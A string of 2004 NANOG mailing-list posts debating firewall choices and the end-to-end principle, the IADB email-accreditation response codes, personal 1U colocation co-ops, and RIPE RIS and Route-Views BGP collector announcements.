Re: Long-term identifiers (was Re: who offers cheap (personal) 1U colo?)
Sean, SD ... A long-term end-to-end SD identifier would let me immediately drop the specific infected computer's SD traffic regardless of its rotating IP addresses, even if your abuse What is to prevent rapid changes to the identifier, even more easily than rapidly changing IP addresses? In other words, why trust the identifier? Or at least, how would this identifier really be long term? d/ -- Dave Crocker dcrocker-at-brandenburg-dot-com Brandenburg InternetWorking www.brandenburg.com Sunnyvale, CA USA tel:+1.408.246.8253
Update on Querying IADB
For those interested in seeing how this has evolved, and what exactly this particular accreditation database provides, our query pages have been expanded, and include a link to the full suggested DNSL data response codes. The codes we use at present include: 127.0.0.1Listed in IADB 127.0.1.255 Vouched listing 127.2.255.1 Publishes SPF record 127.2.255.2 Publishes Microsoft Caller I.D. for Email record 127.2.255.101Participates in Habeas program 127.2.255.102Participates in Ironport's Bonded Sender program 127.3.100.0 Has absolutely no mailing controls in place 127.3.100.1 Scrapes addresses, pure opt-out only 127.3.100.2 Accepts unverified sign-ups such as through web page 127.3.100.3 Accepts unverified sign-ups, gives chance to opt out 127.3.100.4 Reserved 127.3.100.5 Has opt-in confirmation mechanism 127.3.100.6 Has and uses opt-in confirmation mechanism 127.3.100.7 Reserved 127.3.100.8 Reserved 127.3.100.9 Reserved 127.3.100.10 All mailing list mail is confirmed opt-in The general information is at http://www.isipp.com/iadb.php Query information specifically is at http://www.isipp.com/iadbquery.php It is, of course, free to query IADB, as well as to be listed as an individual. Anne
Re: Assymetric Routing / Statefull Inspection Firewall
On Tue, 2004-03-16 at 21:27, Mike Turner wrote: I am currently looking for a statefull inspection firewall that support asymmetric routing is there such a product? Sounds like you are looking for an SI firewall that supports full load balancing, not just high availability. FW-1 does this, there may be others as well. Keep in mind that you can run into connectivity issues if you have big pipe connections. You end up in a situation where outbound packets can cross one firewall and replies can hit the other before the state info has had time to sync. Beyond that, it should fit your need. Chris
ANNOUNCEMENT: RIPE NCC's Second Remote Route Collector in North America Deployed at the NYIIX (RRC11)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Dear All, The RIPE NCC is pleased to announce that the Routing Information Service's (RIS) second Remote Route Collector in North America, RRC11, is now ready to peer with members at the New York International Internet Exchange (NYIIX). The collector is our first outside of the RIPE region to accept IPv6 peering sessions. The RIS is also present at MAE-West in San Jose and we are currently looking for more peers there too. Please see the following URLs for peering details: - - http://www.ripe.net/ris/rrc11.html - - http://www.ripe.net/ris/rrc08.html Your BGP feeds are warmly welcome :) +++ Other RIS Developments: - --- * New web interface for RISwhois - RIPE NCC IPv4/IPv6 address to origin mapping The service looks up IPv4 or IPv6 addresses in the RIB dumps most recently collected by the RIS, and reports the prefixes and origin AS numbers which match the specified IP, as well as the RRCs that observed the prefixes. URL: http://www.ris.ripe.net/cgi-bin/riswhois.cgi * RIS 'MOAS' Report List of prefixes being advertised by Multiple Origin Autonomous Systems. URL: http://www.ris.ripe.net/moas/moas.html * Documentation on how to set up the RISng database and the associated tools An in-depth overview of the RIS database structure written by two students at the Technical University of Munich. URL: http://www.ripe.net/ris/analysis.html * Libbgpdump 1.4 is now available on the RIS web site Libbgpdump is a C library for reading Zebra/Quagga dump files with IPv4 and IPv6 support. The software package also includes 'bgpdump', a drop-in replacement for route_btoa with IPv6 support and better handling of corrupt data. URL: http://www.ris.ripe.net/source/ +++ For more info about the RIS: http://www.ripe.net/ris. Feel free to drop us a line at [EMAIL PROTECTED] Best regards, The RIS Team --- Matthew Williams (MW243-RIPE) Customer Liaison Engineer RIPE NCC - http://www.ripe.net/np/ -BEGIN PGP SIGNATURE- Version: PGP 7.0.4 iQA/AwUBQFg4NMHkFbJe+GdoEQJCNACePKtzxSUuGEH41Aa8ECLgqkBFekMAoKop mq+MIgrl4q9rQ2NBhdcD5XZP =ygY7 -END PGP SIGNATURE-
Re: Update on Querying IADB
thanks. but I use 127.0.0.0/8 for other stuff. Hope you don't mind. For those interested in seeing how this has evolved, and what exactly this particular accreditation database provides, our query pages have been expanded, and include a link to the full suggested DNSL data response codes. The codes we use at present include: 127.0.0.1 Listed in IADB 127.0.1.255Vouched listing ... list elided. --bill
Re: Firewall opinions wanted please
Netscreen rocks. They are record-breakingly sexy devices running the gamut as far as networks they can be configured to service and they burlier beasties are easily worthy of deployment on a carrier class network. However, if you're looking to drop small change on a product that will not be required to withstand the rigors of VPN termination, HA, VRRP, blah blah blah, and you are trying to cover basic, fundamental firewalling (port filtering is a very base feature and should open the doors to many other vendors if that's truly the brunt of what you are trying to achieve), then take a gander at PIX. Or even Raptor or Checkpoint. All 3 are old standbys that have seen their days being equally celebrated as leaders and mourned as losers. boa sorte, --ra -- k. rachael treu, CISSP [EMAIL PROTECTED] ..quis costodiet ipsos custodes?.. On Tue, Mar 16, 2004 at 02:27:16PM -0800, Nicole said something to the effect of: Hi I am looking for a good but reasonably priced firewall for a 40 or so server site. Some people swear by Pix, others swear at it a lot. Also I have heard good things about Netscreen. Or any others you would recommend for protecting servers on a busy network. Don't really need anything with VPN just the standard http, ftp, ssh, https, type traffic up to 100mb throughput. From what I have heard a proxy firewall would be best? Thanks in advance!! Nicole -- |\ __ /| (`\ | o_o |__ ) ) // \\ - [EMAIL PROTECTED] - Powered by FreeBSD - -- Daemons will now be known as spiritual guides -Politically Correct UNIX Page
Re: Firewall opinions wanted please
On Tue, Mar 16, 2004 at 05:01:22PM -0600, Gregory Taylor said something to the effect of: ..snip snip.. As discussed in a previous thread, I spoke about transparent bridging used for packet filtering and mangling. On a small application, that might be a good idea, because you get all of the true internet access (i.e. legit IPs, no proxying etc.) with the same ability to filter TCP, ICMP, UDP, IGMP etc. traffic. Disadvantages to dealing with transparent bridging is that you run into the whole MAC address collision and excess over-head announcements being made from the bridge itself every time it sends a packet through. The best option I guess is to figure out how important it is for you to have a firewall, _Everyone_ (network connected) should have a firewall. My grandma should have a firewall. Nicole, holding dominion over this business network and its critical infrastructure, should _definitely_ have a firewall. ;) Curses. Budget constraints. Bah. what is the reason you need one and how important the data is on your servers. That will help you decide the best choice for a firewall or proxy application. See above. ;) The importance of the data is often more and issue of calculating things like redundancy and storage. A firewall in this case should likely be regarded as non-negotiable. Be careful with transparent bridging in lieu of stricter edge filtering... Also consider the efficacy and reward of firewall logs, application layer filtering, and IDS integration (in a budget-friendly, open source flavor of free...) down the road. ymmv, --ra -- k. rachael treu, CISSP [EMAIL PROTECTED] ..quis costodiet ipsos custodes?.. Greg -- Original Message -- From: Nicole [EMAIL PROTECTED] Date: Tue, 16 Mar 2004 14:27:16 -0800 (PST) Hi I am looking for a good but reasonably priced firewall for a 40 or so server site. Some people swear by Pix, others swear at it a lot. Also I have heard good things about Netscreen. Or any others you would recommend for protecting servers on a busy network. Don't really need anything with VPN just the standard http, ftp, ssh, https, type traffic up to 100mb throughput. From what I have heard a proxy firewall would be best? Thanks in advance!! Nicole -- |\ __ /| (`\ | o_o |__ ) ) // \\ - [EMAIL PROTECTED] - Powered by FreeBSD - -- Daemons will now be known as spiritual guides -Politically Correct UNIX Page
Re: Firewall opinions wanted please
The best option I guess is to figure out how important it is for you to have a firewall, _Everyone_ (network connected) should have a firewall. My grandma should have a firewall. Nicole, holding dominion over this business network and its critical infrastructure, should _definitely_ have a firewall. ;) Why? When did the end2end nature of the Internet suddenly sprout these mutant bits of extra complexity that reduce the overall security of the 'net? Two questions asked, Two answers are sufficent. --bill
Re: Update on Querying IADB
On Wed, 17 Mar 2004 01:48:45 PST, Anne P. Mitchell, Esq. [EMAIL PROTECTED] said: 127.3.100.3Accepts unverified sign-ups, gives chance to opt out 127.3.100.5Has opt-in confirmation mechanism 127.3.100.6Has and uses opt-in confirmation mechanism 127.3.100.10 All mailing list mail is confirmed opt-in Hmm.. this is loads of fun if you're running a Listserv that has several thousand lists defined, and not all of them have the same policies (for instance, although the vast majority of our lists are 'confirmed opt-in', we have several lists that are bulk-loaded with database extracts for captive audience lists such as all freshmen, all grad students, and so on). Also, the pricing seems a bit whacked - are you *really* expecting sites that have less than 30 customers to pay $200/month? I know a *lot* of people who have formed collectives of 10-15 people who chip in and get a 1U at a colo It's totally unclear how you can encode an individual listing - that whole stuff to the left of the @ sign thing is rather unhandy... I'll skip the estimates of the cash flow generated if the database gets big enough to be useful, but I suspect that Verisign might have competition pgp0.pgp Description: PGP signature
Re: Update on Querying IADB
Also, the pricing seems a bit whacked - are you *really* expecting sites that have less than 30 customers to pay $200/month? I know a *lot* of people who have formed collectives of 10-15 people who chip in and get a 1U at a colo They are not email service providers; if you are talking about a site which only publishes non-commercial mailing lists, they would probably fall under the newsletter publisher rate, which is $10.00/month. Anne
[Fwd: Re: who offers cheap (personal) 1U colo?]
Stephen J. Wilcox wrote: if the market for this is nanog and you're just looking for smtp/shell surely we can manage this between ourselves without charge (ask your nanog buddy for a shell as a favour).. I know I can and will do this Well, I do have motives beyond outbound smtp. I actually looked at some of the mail only services, but I really want someplace that will do IMAP and authenticated SMTP. I want to be able to configure how I filter spam, which I don't want to do at the MUA level because I'll need to access mail various ways from various locations. Besides mail, I want to be able to create and control firewall rules on the box. I also want to be able to setup Apache exactly like I want it, etc. And sometimes its nice to have shell access on a machine in a different location for troubleshooting purposes. However, I do like the idea of setting up a community of like minded individuals who would be willing to do secondary MX and/or DNS for each other, and perhaps provide basic shell accounts... On the other hand, I'm a little leary of giving someone I don't know access to one of my boxes. I'm curious how a virtual colocation or dedicated server co-op could work, with values statements on how servers must be run (secure, no SPAM), etc. Would there be member fees? Would members have to democratically vote to let new members in after some kind of vetting process? Would anyone even be interested in such an idea? It would also be interesting to see what kind of monitoring tools could be developed with a diverse set of servers in different parts of the world... could we set up a co-op version of keynote monitoring, where we helped monitor each other?
Re: Firewall opinions wanted please
On Wed, Mar 17, 2004 at 08:54:57AM -0800, bill said something to the effect of: The best option I guess is to figure out how important it is for you to have a firewall, _Everyone_ (network connected) should have a firewall. My grandma should have a firewall. Nicole, holding dominion over this business network and its critical infrastructure, should _definitely_ have a firewall. ;) Why? When did the end2end nature of the Internet suddenly sprout these mutant bits of extra complexity that reduce the overall security of the 'net? Two questions asked, Two answers are sufficent. Nope. One will do it. The day the first remote exploit or condition, in protocol or application, that could potentially have given rise to such and exploit made it possible for a user not in your control to gain control of your box(en), firewalling became necessary. Then Internet is not exactly end-to-end beyond pure fundamentals; it's more end-to-many-ends. And the notion of end-to-end requires preservation of a connection between 2 consenting hosts, and preservation includes securement of that connection against destructive mechanisms, which includes the subversive techniques and intercetptions commonly associated with network security. Denial of Service is as much a threat to availability and network functionality as is power outage if it occurs. Before this turns to a you security freaks want to screw around with my network and don't care about availability... Firewalls are logical interventions, costing as little as some processor overhead. Dedicated appliances are only one deployment. Filters on routers also qualify as firewalls. Am I correct in understanding that you feel edge filtering is mutant lunacy and unnecessary complexity? Regarding dedicated firewalls, please see Mr. Bellovin's previous post regarding appropriate and competent administration. The lack thereof presents the complication, not the countermeasure itself. As for your assertion that firewalls reduce the overall security of the 'netcan you please elaborate on that, as well? Other factions might/do argue that it's the other team refusing to lock their doors at night that are perpetuating the flux of bad behavior as a close second to the ignorant and infected. --ra -- k. rachael treu, CISSP [EMAIL PROTECTED] ..quis costodiet ipsos custodes?.. --bill
Re: Firewall opinions wanted please
_Everyone_ (network connected) should have a firewall. Why? Every network-connected device should have a security layer. Firewalls provide a nice modular security layer and they are cheap compared to the devices/networks that they protect. When did the end2end nature of the Internet suddenly sprout these mutant bits of extra complexity that reduce the overall security of the 'net? The security issue has always been there. You can either build security into the network or into the endpoints. Given that the Internet model is to keep complexity out of the network and in the endpoints, the next question is for site administrators to ask themselves, do I manage *MY* network, like the Internet, or do I manage it like an endpoint? If the answer is to treat it as an endpoint, then it is quite appropriate to install a firewall as a gateway between the network and the Internet. Consider that many endpoints in today's world now encapsulate networks within a single physical device. Routers, switches, cellphones, cars and any embedded device using I2C. Just as the distinction between a router and a switch has been blurred by the advance of technology, so too has the distinction between an endpoint and a network. --Michael Dillon
Re: Firewall opinions wanted please
_Everyone_ (network connected) should have a firewall. My grandma should have a firewall. Nicole, holding dominion over this business network and its critical infrastructure, should _definitely_ have a firewall. ;) By firewall, do you mean dedicated unit that does statefull filtering or just something that will block packets? We've successfully argued to just about every group here at our University who came to us asking for a firewall that, given what they wanted to achieve, they could accomplish the same thing with simple ACLs... I'm sure that the cost of the ACL's (i.e. $0.00) versus the cost of a firewall also helped them in their decision... Eric :)
House Panel Slams Federal IT Security
Hi, Federal agencies aren't doing enough to secure their network systems, even as documented cyber-attacks against the U.S. government continue to dramatically rise, U.S. Rep. Adam Putnam (R-FL) said Thursday. For more info check http://www.internetnews.com/infra/article.php/3327081 Thanks, -J __ Do you Yahoo!? Yahoo! Mail - More reliable, more storage, less spam http://mail.yahoo.com
Re: Update on Querying IADB
The codes we use at present include: 127.0.0.1Listed in IADB Hmmm... listed in my /etc/hosts as well. Am I IADB compliant? It's interesting to see how everyone tries to reinvent LDAP on top of DNS and/or BGP instead of just using the LDAP protocol itself. Somehow the world has gotten the idea that LDAP is an addressbook protocol when, in fact, it is a fairly generic distributed hierarchical database access protocol. IMHO there are two right ways to publish these types of databases. One is to use LDAP and the other is to use an XML protocol like XML-RPC or SOAP. Overloading DNS as a generic database query protocol is just a plain bad idea. At least both LDAP and XML support the concept of a schema which defines the data being transmitted in an unambiguous way and ensures that it can be correctly parsed and decoded. --Michael Dillon
Re: Firewall opinions wanted please
Date: Wed, 17 Mar 2004 11:57:33 -0600 From: Rachael Treu [EMAIL PROTECTED] Sender: [EMAIL PROTECTED] On Wed, Mar 17, 2004 at 08:54:57AM -0800, bill said something to the effect of: The best option I guess is to figure out how important it is for you to have a firewall, _Everyone_ (network connected) should have a firewall. My grandma should have a firewall. Nicole, holding dominion over this business network and its critical infrastructure, should _definitely_ have a firewall. ;) Why? When did the end2end nature of the Internet suddenly sprout these mutant bits of extra complexity that reduce the overall security of the 'net? Two questions asked, Two answers are sufficent. Nope. One will do it. The day the first remote exploit or condition, in protocol or application, that could potentially have given rise to such and exploit made it possible for a user not in your control to gain control of your box(en), firewalling became necessary. Then Internet is not exactly end-to-end beyond pure fundamentals; it's more end-to-many-ends. And the notion of end-to-end requires preservation of a connection between 2 consenting hosts, and preservation includes securement of that connection against destructive mechanisms, which includes the subversive techniques and intercetptions commonly associated with network security. Denial of Service is as much a threat to availability and network functionality as is power outage if it occurs. Before this turns to a you security freaks want to screw around with my network and don't care about availability... Firewalls are logical interventions, costing as little as some processor overhead. Dedicated appliances are only one deployment. Filters on routers also qualify as firewalls. Am I correct in understanding that you feel edge filtering is mutant lunacy and unnecessary complexity? Regarding dedicated firewalls, please see Mr. Bellovin's previous post regarding appropriate and competent administration. The lack thereof presents the complication, not the countermeasure itself. As for your assertion that firewalls reduce the overall security of the 'netcan you please elaborate on that, as well? Other factions might/do argue that it's the other team refusing to lock their doors at night that are perpetuating the flux of bad behavior as a close second to the ignorant and infected. I dislike firewalls for many applications, although I have a Sonic Wall on my cable modem. On the whole, they lead to false belief that firewalls really make you safe. They also block many interesting applications. Things like H.323 conferencing are made vastly more complex by firewalls with no easy or canned work-arounds. One large research site I work closely with has directly opted for IDS with a bad attitude (love that description) which has successfully blocked many intrusion and DOS attempts with no major failures. Slammer did overwhelm it, but it did the same for most everything. The end-to-end nature of the net is really, really important, but is being blocked more and more by those who thing the net is web browsing and e-mail clients and that everything else is simply an annoyance. This attitude is hamstringing network development already and may end up turning the commercial Internet into a permanently limited tool with fewer real capabilities that the ARPANET had before TCP/IP replaced NCP. Grandma may need a firewall. (My sister DEFINITELY needs one.) But not all network connections need or will benefit from a firewall. And many system will exist with significant security flaws because the owners believe that the firewall takes care of everything. -- R. Kevin Oberman, Network Engineer Energy Sciences Network (ESnet) Ernest O. Lawrence Berkeley National Laboratory (Berkeley Lab) E-mail: [EMAIL PROTECTED] Phone: +1 510 486-8634
Re: who offers cheap (personal) 1U colo?
On Wed, 17 Mar 2004, Janet Sullivan wrote: How would this vetting process work? I'm willing to give other nanog folks shell accounts on my machine in return for same, but I really don't want to hand out accounts to packet kiddies. Restrict it to people you've met or spoken to enough to think you know them.. Steve
Re: who offers cheap (personal) 1U colo?
Hello Janet/List - First, allow me to introduce myself, my name is Jonathan M. Slivko and I work for InvisibleHand Networks, Inc. (http://www.invisiblehand.net). Currently, we offer colocation and bandwidth services in the New York/New Jersey market (Telehouse and Equinix to be precise). The reason for this post is to put forth a suggestion: InvisibleHand Networks, Inc. allows you to buy bandwidth on demand as needed without having to commit to any bandwidth level, 95th percentile or long term contract. We can colocate personal 1U servers at either facility for a set price per server and then you can purchase bandwidth on our spot market. All of our services are on month-to-month contracts and we can offer you some kind of discount if you buy in bulk. However, without having a valid consensus as to how many people would be interested in such a deal, I cannot/will not offer pricing on this list (contact me offlist if interested). I look forward to talking to you soon. Janet Sullivan wrote: I have been aching for this now for about six years. In every professional setting I've ever been in, a need for this kind of thing arises and my advice to my employer/client is always the same: pay the $x per month for a colo server for your network/system engineers to use as an outpost for emergencies, external analysis, and monitoring. Exactly! While route servers are great, sometimes I need the flexablity of an outside shell account to do troubleshooting. I know a few other people at work who also keep outside shell accounts somewhere for this very purpose. It seems like approaching one of the larger colo providers and coordinating some sort of NANOG Discount might be one quick route. I'm of two minds on this. Obviously, if a group of us go to provider X and say we want Z amount of rack space, we can probably get a good deal. On the other hand, I'm also interested in a community of like minded folks with servers located in diverse environments who would trade access with one another. If we're all in one rack in one datacenter, there is more of a chance we'll all go down together. If we have a diverse footprint, that is much less likely to happen. The discount could be restricted to those who are appropriately vetted. This program would be of value to the colo provider because of the potential for discount recipients to direct business their way. How would this vetting process work? I'm willing to give other nanog folks shell accounts on my machine in return for same, but I really don't want to hand out accounts to packet kiddies. Suffice it to say, I'm interested, both to address current work-day issues and for personal use. I'm also interested. I do currently have a dedicated FreeBSD server in Australia for personal use. Those of us who are running our own personal mail DNS servers could get together to back each other up. -- Jonathan M. Slivko [EMAIL PROTECTED] Sales/Network Operations Invisible Hand Networks, Inc. http://www.invisiblehand.net 670 Broadway, 2nd Floor, New York, NY 10012 Ph: 212-226-1422 F: 212-202-7640 M: 646-924-9211
RE: Firewall opinions wanted please
Depending on your chosen vendor the ACL cost is unlikely to be $0 - if you steal CPU cycles from packet forwarding then you incur earlier router upgrade costs and that has a NPV cost increase associated with it. It's just not as obvious as a invoice for a firewall. Matt. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Eric Gauthier Sent: 17 March 2004 17:20 To: [EMAIL PROTECTED] Subject: Re: Firewall opinions wanted please _Everyone_ (network connected) should have a firewall. My grandma should have a firewall. Nicole, holding dominion over this business network and its critical infrastructure, should _definitely_ have a firewall. ;) By firewall, do you mean dedicated unit that does statefull filtering or just something that will block packets? We've successfully argued to just about every group here at our University who came to us asking for a firewall that, given what they wanted to achieve, they could accomplish the same thing with simple ACLs... I'm sure that the cost of the ACL's (i.e. $0.00) versus the cost of a firewall also helped them in their decision... Eric :) -- Live Life in Broadband www.telewest.co.uk The information transmitted is intended only for the person or entity to which it is addressed and may contain confidential and/or privileged material. Statements and opinions expressed in this e-mail may not represent those of the company. Any review, retransmission, dissemination or other use of, or taking of any action in reliance upon, this information by persons or entities other than the intended recipient is prohibited. If you received this in error, please contact the sender immediately and delete the material from any computer. ==
Re: who offers cheap (personal) 1U colo?
Mike Damm wrote: That being said, I've had the idea for a couple years now of getting enough geeky folks together to rent a rack on both coasts and populate it with a few different operating systems and bits of gear for just the reasons outlined in this thread. So if you decide to put something together, I'm up for it. I got an email from Eric Brunner-Williams who hangs out on freebsd-isp and nanog that really sparked my interest. Go to http://wampumpeag.net/vixie-personal-1U-colo.html At the bottom of the page it reads: We've started the paperwork with the NCBA to form a real honest-to-goodness member-owned cooperative for bloggers, and a real honest-to-goodness member-owned cooperative for personal 1U colo is just a second set of paper. This is about as vague as a price sheet can get, but this was where we were headed before Paul popped the question on NANOG, and in April we'll be accepting member 1U units.
Re: Firewall opinions wanted please
Not _firewalling_, but access limitation. Grandma can live with PNAT router - she do not need any firewall, if she do not grant external access to anything. She can live with Windows _default deny_ setting. If grandma have extra money, it is better to purchase anty-virus. Moreover. Just for _ghrandma_, it can be cheaper do nothing than to invest into security (bad thing for us, I know!) - because she lost '$0' in case of intrusion... It explains shidespread of modern viruses, spam-trojans etc (they cost '$0' to infected households in many cases). It is as Wireless access - my friend have secured access point, but when I tried, I could use unsecured access points of 2 his neighbourths. They know abouth insecurity - but they do not lost anything, so they do not want to spend $0.01 to improve it. And unfortunately, I can not blame them. On Wed, Mar 17, 2004 at 08:54:57AM -0800, bill said something to the effect of: The best option I guess is to figure out how important it is for you to have a firewall, _Everyone_ (network connected) should have a firewall. My grandma should have a firewall. Nicole, holding dominion over this business network and its critical infrastructure, should _definitely_ have a firewall. ;) Why? When did the end2end nature of the Internet suddenly sprout these mutant bits of extra complexity that reduce the overall security of the 'net? Two questions asked, Two answers are sufficent. Nope. One will do it. The day the first remote exploit or condition, in protocol or application, that could potentially have given rise to such and exploit made it possible for a user not in your control to gain control of your box(en), firewalling became necessary. Then Internet is not exactly end-to-end beyond pure fundamentals; it's more end-to-many-ends. And the notion of end-to-end requires preservation of a connection between 2 consenting hosts, and preservation includes securement of that connection against destructive mechanisms, which includes the subversive techniques and intercetptions commonly associated with network security. Denial of Service is as much a threat to availability and network functionality as is power outage if it occurs. Before this turns to a you security freaks want to screw around with my network and don't care about availability... Firewalls are logical interventions, costing as little as some processor overhead. Dedicated appliances are only one deployment. Filters on routers also qualify as firewalls. Am I correct in understanding that you feel edge filtering is mutant lunacy and unnecessary complexity? Regarding dedicated firewalls, please see Mr. Bellovin's previous post regarding appropriate and competent administration. The lack thereof presents the complication, not the countermeasure itself. As for your assertion that firewalls reduce the overall security of the 'netcan you please elaborate on that, as well? Other factions might/do argue that it's the other team refusing to lock their doors at night that are perpetuating the flux of bad behavior as a close second to the ignorant and infected. --ra -- k. rachael treu, CISSP [EMAIL PROTECTED] ..quis costodiet ipsos custodes?.. --bill
NetAdmin + sales on NANOG like places.
On Wed, 17 Mar 2004, Jonathan M. Slivko wrote: SNIP INTRO SALES BLURB I look forward to talking to you soon. Jonathan M. Slivko [EMAIL PROTECTED] Sales/Network Operations Invisible Hand Networks, Inc. I am currently doing a little of both sales/network admin at my company which competes directly with Jonathan's in the NYC market. I have some ?s about (network admins + sales people) for nanog folk: - As much as I sympathize with JS's desire to get his company name and information out, is this kind of E-mail encouraged/discouraged on NANOG? (AUP: Blatant product marketing is unacceptable. Does this fit?) - Are more of the current network/system admins being asked to leverage otherwise non-business relationships (like NANOG) to increase sales? My initial reaction to his E-mail was sympathy for the effort, but I'm curious if other netadmins are being handed a sales hat. I don't mean the people who switched to the sales team totally. - Do you still maintain your network equipment and now have the responsibility to bring in new business for your company? (This assumes the company is/was large enough to not need you to do both.) - Where do we draw the line on NANOG discussions about steering a conversation that hits close enough to your business to allow this? I know from some of my previous posts there are a lot of marketing/sales types subscribed to NANOG that can/will/ and do jump at an opportunity to sell their product. I also know that sometimes we ask for that ourselves like Paul's question about 1U that he is summarizing off list so there is a place for these people to participate. Will there soon be a place for North American Sales And Network Operators Group NASA-NOG mailing list more focused on putting the techs in touch with the sales guys? Would NANOG as a group agree (I know...you can laugh now.) that requests made here for suggestions are more often looking for technical people that have purchased from a company than a slightly biased sales pitch from the company you work for? I'm not an anti-capitalist, but I do like to attempt to keep the SNR down and if companies force sales hats to the networking staff this will become much more prevalent. Jonathan this isn't intended to offend you either, so I hope you don't take it that way. SpamAssassin in place and filters setup so I can handle the replies for anyone who wants to respond off the list. Gerald Coon Network Administrator (Who also wears a sales hat at times for the same company) Internet Channel
New route-views collector up at the LINX
Folks, We are now up and running at the LINX (London Internet Exchange) and would like to invite folks at the LINX to peer with route-views. You can get to the open CLI via 'telnet route-views.linx.routeviews.org' (of course, nothing much there yet). Please contact us at [EMAIL PROTECTED] if you would like to contribute your view. In addition, I've included our standard boilerplate below. Thanks, The Route-Views Team - AS : 6447 University of Oregon: route-views : 128.223.60.103(multi-hop IPv4) route-views2: 128.223.60.102(multi-hop IPv4) route-views3: 128.223.60.108(multi-hop IPv4) : 2001:468:d01:3c::80df:3c6c(multi-hop IPv6) route-views6: 128.223.60.194(v6 peering only) : 2001:468:d01:3c::80df:3c6d(multi-hop IPv6) route-views.wide: 202.249.2.166 (WIDE peering only) route-views.paix: 198.32.176.5 (PAIX peering only) route-views.linx: 195.66.225.222(LINX peering only) route-views.linx: 195.66.227.222(LINX peering only) - Route-views does not announce _any_ prefixes. - We would like to receive a full default-free table from all sessions with all peers. - In order for our multihop-ebgp sessions to survive transient network failures, we would like to increase the BGP hold-timer to 10 minutes (600 seconds). A value of zero does not work for several cases. If possible, peers should set their hold-timer to the max value which allows Route-Views to change without your intervention. cisco: neighbor 128.223.60.x timers 21845 65535 juniper: set protocols bgp group routeviews hold-time 65535 - Please send your communities. If possible, please describe the communities you advertise. - Please provide your NOC's email and telephone number(s). - Route information from these sessions is made publicly available in two forms: manufacturer-style show ip bgp and MRT format. -- Short questionnaire. These data will only be shared with researchers. - What type of router(s) are we peering with? - We have a (closed) mail list which we use to announce outages to our peers. If you would like your noc added to this list, please let us know. Thanks!
Cisco switch CPU overload
I've a core switch (cisco 5505) with 10+ VLANs configured on that and a cisco 7204 directly connected to it. 7204 then connects to my upstream and we run BGP. we announce two different /21 blocks and was fine until last week. We got new /20 IP block and we advertised it (added to 7204 config). Everything is working fine but since than we see CPU overload from time to time on 5505. The following further explains the physical connection. |---| |---| Internal| |---| |Upstream -|5505 | |7204 | |---| |---| We have Rip (ver 2) running on 5505 but not on 7204. (Those two are not talking any routing protocols each other.) I can't figure out the reason but want urgently get this resolved. You may contact me off list too for further info necessary. Thanks in advance, Priyantha Pushpa Kumara Wightman Internet Ltd.
Re: Firewall opinions wanted please
Rachael Treu wrote: _Everyone_ (network connected) should have a firewall. My grandma should have a firewall. Nicole, holding dominion over this business network and its critical infrastructure, should _definitely_ have a firewall. ;) No, the applications should accept only authorized connections. If that would be the case, there would be no need to filter at packet level. Pete
Re: Firewall opinions wanted please
Guys...firewall is as generic a term as any. Saying grandma needs a router does not mean that an M20 is interchangeable with her Linksys. The definition of firewall[1]: 1. A fireproof wall used as a barrier to prevent the spread of fire. 2. Computer Science. Any of a number of security schemes that prevent unauthorized users from gaining access to a computer network or that monitor transfers of information to and from the network. By that rationale, firewall includes ACLs, filtering, and the umpteen built-in apps that ship standard with home CPE/routers that _call themselves_ firewall software. I am absolutely talking access control. Not about an HA Netscreen500 pair with VRRP off redundant switch fabric and H.323 support. As for your cost commentary, you are absolutely right. I said grandma needs a firewall, not that she has one or will buy one. That is the unfortunate disparity between prudence and practical application. --ra [1]http://dictionary.reference.com/search?q=firewall -- k. rachael treu, CISSP [EMAIL PROTECTED] ..quis costodiet ipsos custodes?.. On Wed, Mar 17, 2004 at 11:19:54AM -0800, Alexei Roudnev said something to the effect of: Not _firewalling_, but access limitation. Grandma can live with PNAT router - she do not need any firewall, if she do not grant external access to anything. She can live with Windows _default deny_ setting. If grandma have extra money, it is better to purchase anty-virus. Moreover. Just for _ghrandma_, it can be cheaper do nothing than to invest into security (bad thing for us, I know!) - because she lost '$0' in case of intrusion... It explains shidespread of modern viruses, spam-trojans etc (they cost '$0' to infected households in many cases). It is as Wireless access - my friend have secured access point, but when I tried, I could use unsecured access points of 2 his neighbourths. They know abouth insecurity - but they do not lost anything, so they do not want to spend $0.01 to improve it. And unfortunately, I can not blame them. On Wed, Mar 17, 2004 at 08:54:57AM -0800, bill said something to the effect of: The best option I guess is to figure out how important it is for you to have a firewall, _Everyone_ (network connected) should have a firewall. My grandma should have a firewall. Nicole, holding dominion over this business network and its critical infrastructure, should _definitely_ have a firewall. ;) Why? When did the end2end nature of the Internet suddenly sprout these mutant bits of extra complexity that reduce the overall security of the 'net? Two questions asked, Two answers are sufficent. Nope. One will do it. The day the first remote exploit or condition, in protocol or application, that could potentially have given rise to such and exploit made it possible for a user not in your control to gain control of your box(en), firewalling became necessary. Then Internet is not exactly end-to-end beyond pure fundamentals; it's more end-to-many-ends. And the notion of end-to-end requires preservation of a connection between 2 consenting hosts, and preservation includes securement of that connection against destructive mechanisms, which includes the subversive techniques and intercetptions commonly associated with network security. Denial of Service is as much a threat to availability and network functionality as is power outage if it occurs. Before this turns to a you security freaks want to screw around with my network and don't care about availability... Firewalls are logical interventions, costing as little as some processor overhead. Dedicated appliances are only one deployment. Filters on routers also qualify as firewalls. Am I correct in understanding that you feel edge filtering is mutant lunacy and unnecessary complexity? Regarding dedicated firewalls, please see Mr. Bellovin's previous post regarding appropriate and competent administration. The lack thereof presents the complication, not the countermeasure itself. As for your assertion that firewalls reduce the overall security of the 'netcan you please elaborate on that, as well? Other factions might/do argue that it's the other team refusing to lock their doors at night that are perpetuating the flux of bad behavior as a close second to the ignorant and infected. --ra -- k. rachael treu, CISSP [EMAIL PROTECTED] ..quis costodiet ipsos custodes?.. --bill
Re: Firewall opinions wanted please
